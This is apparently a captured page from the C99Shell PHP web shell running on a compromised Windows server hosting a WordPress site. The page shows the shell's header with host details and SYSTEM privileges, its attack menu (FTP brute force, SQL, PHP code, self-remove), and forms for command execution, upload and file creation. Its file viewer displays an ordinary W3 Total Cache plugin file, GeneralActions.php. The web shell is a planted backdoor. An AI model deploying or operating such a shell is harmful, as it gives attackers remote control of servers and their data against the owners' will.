!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     GeneralActions.php (1.94 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
class W3_GeneralActions extends W3_Plugin {
    function 
run() {
        
add_filter('post_row_actions', array(
            &
$this,
            
'post_row_actions'
        
), 02);

        
add_filter('page_row_actions', array(
            &
$this,
            
'page_row_actions'
        
), 02);

        
add_action('post_submitbox_start', array(
            &
$this,
            
'post_submitbox_start'
        
));
    }


    
/**
     * post_row_actions filter
     *
     * @param array $actions
     * @param object $post
     * @return array
     */
    
function post_row_actions($actions$post) {
        if (
current_user_can('manage_options'))
            
$actions array_merge($actions, array(
                
'pgcache_purge' => sprintf('<a href="%s">' __('Purge from cache''w3-total-cache') . '</a>'wp_nonce_url(sprintf('admin.php?page=w3tc_dashboard&w3tc_flush_pgcache_purge_post&post_id=%d'$post->ID), 'w3tc'))
            ));

        return 
$actions;
    }

    
/**
     * page_row_actions filter
     *
     * @param array $actions
     * @param object $post
     * @return array
     */
    
function page_row_actions($actions$post) {
        if (
current_user_can('manage_options')) {
            
$actions array_merge($actions, array(
                
'pgcache_purge' => sprintf('<a href="%s">' __('Purge from cache''w3-total-cache') . '</a>'wp_nonce_url(sprintf('admin.php?page=w3tc_dashboard&w3tc_flush_pgcache_purge_page&post_id=%d'$post->ID), 'w3tc'))
            ));
        }
        return 
$actions;
    }

    
/**
     * Display Purge from cache on Page/Post post.php.
     */
    
function post_submitbox_start() {
        if (
current_user_can('manage_options'))  {
            global 
$post;
            echo 
'<div>'sprintf('<a href="%s">' __('Purge from cache''w3-total-cache') . '</a>'wp_nonce_url(sprintf('admin.php?page=w3tc_dashboard&w3tc_flush_pgcache_purge_page&post_id=%d'$post->ID), 'w3tc')), '</div>';
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--